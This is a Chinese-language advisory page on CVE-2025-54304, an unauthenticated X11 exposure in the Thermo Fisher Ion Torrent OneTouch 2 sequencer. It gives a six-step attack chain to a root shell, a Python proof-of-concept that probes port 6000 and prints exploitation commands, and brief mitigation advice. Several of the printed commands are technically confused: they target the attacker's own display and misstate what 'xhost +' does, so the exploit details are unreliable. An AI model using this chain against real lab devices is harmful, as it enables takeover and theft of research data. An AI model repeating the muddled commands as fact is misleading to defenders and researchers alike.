CVE-2025-54304 Thermo Fisher Ion Torrent OneTouch 2 X11未授权访问漏洞

漏洞信息

漏洞编号

CVE-2025-54304

漏洞类型

未授权访问/远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Thermo Fisher Ion Torrent OneTouch 2 INS1005527

漏洞概述

CVE-2025-54304是Thermo Fisher Ion Torrent OneTouch 2设备中的一个严重安全漏洞。该设备在开机时会自动启动X11显示服务器，默认监听所有网络接口的6000端口。由于X11访问控制列表（ACL）默认仅允许127.0.0.1和192.168.2.15两个地址连接，当设备通过DHCP获取IP地址时，如果未被分配192.168.2.15这个地址，则暴露的X11服务器将对网络上的其他设备可见。攻击者可以利用这一漏洞，无需任何认证即可连接到暴露的X11显示服务器，进而通过matchbox-desktop组件执行任意命令并获取root权限，实现远程代码执行。此漏洞影响使用该设备进行基因测序等生命科学研究活动的组织，攻击者可能窃取敏感研究数据或破坏实验进程。CVSS评分高达9.8，属于严重级别。

技术细节

漏洞根源在于Thermo Fisher Ion Torrent OneTouch 2设备的默认配置存在严重安全隐患。设备启动时自动运行X11显示服务器，该服务绑定到0.0.0.0:6000，理论上任何网络可达的设备都可能连接。X11协议的访问控制机制依赖xhost命令设置的ACL列表，但默认配置仅包含本地回环地址和静态IP 192.168.2.15。在实际部署环境中，设备通常通过DHCP动态获取IP，当IP发生变化时，原本受信任的IP地址列表将失效，导致任何能访问到设备网络的攻击者都能连接X11服务器。成功连接后，攻击者可利用X11协议的特性（如XTEST扩展）模拟用户输入，或直接通过matchbox-desktop启动终端会话。由于应用程序以root权限运行，攻击者获得的shell同样具有最高权限，可完全控制设备并执行任意代码。

攻击链分析

STEP 1

步骤1

扫描目标网络，发现开放6000端口的Thermo Fisher Ion Torrent OneTouch 2设备

STEP 2

步骤2

尝试连接X11显示服务器（DISPLAY=<target_ip>:0），验证端口可访问性

STEP 3

步骤3

使用xhost命令添加任意访问权限（xhost +），绕过ACL限制

STEP 4

步骤4

通过X11协议启动matchbox-desktop或直接打开终端应用

STEP 5

步骤5

利用启动的终端会话获取root shell权限

STEP 6

步骤6

执行任意代码、窃取敏感数据或部署后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-54304 PoC - Thermo Fisher Ion Torrent OneTouch 2 X11 Unauthenticated Access
Usage: python3 cve-2025-54304.py <target_ip>
"""

import socket
import sys

def check_x11_open(target_ip, port=6000):
    """Check if X11 server is accessible on target"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        result = sock.connect_ex((target_ip, port))
        sock.close()
        return result == 0
    except Exception as e:
        print(f"[-] Connection error: {e}")
        return False

def x11_exploit(target_ip, port=6000):
    """
    Exploit X11 to gain shell access via matchbox-desktop
    Requires: xdotool, xterm (or similar tools)
    """
    print(f"[*] Target: {target_ip}:{port}")
    print(f"[*] Checking X11 accessibility...")
    
    if not check_x11_open(target_ip, port):
        print("[-] X11 port is not accessible")
        return False
    
    print("[+] X11 server is exposed!")
    print("[*] To exploit, use the following commands:")
    print(f"    export DISPLAY={target_ip}:0")
    print("    # Disable access control")
    print("    xhost +")
    print("    # Spawn a root terminal via matchbox-desktop")
    print("    xterm -display :0 -bg black -fg white &")
    print("    # Or execute commands directly")
    print("    xdotool key super+alt+t  # Open terminal")
    
    return True

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    x11_exploit(target)

影响范围

Thermo Fisher Ion Torrent OneTouch 2 INS1005527 (所有版本)

Torrent Suite Software (所有版本)

防御指南

临时缓解措施

立即在网络边界部署访问控制策略，阻止除必要管理地址外所有对6000端口的访问；将Thermo Fisher Ion Torrent OneTouch 2设备移至隔离网络区域；如业务允许，可临时禁用X11服务（killall X）或配置X11仅监听127.0.0.1；实施网络分段确保测序设备无法被未经授权的用户访问。